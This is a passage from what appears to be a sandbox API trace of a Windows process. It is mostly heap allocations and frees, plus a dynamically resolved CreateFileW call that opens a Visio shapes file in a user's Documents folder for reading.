(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0084.030] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4838 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.032] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.035] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0084.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0084.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.036] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0084.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431ded8 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0084.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0084.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0084.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0084.038] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: 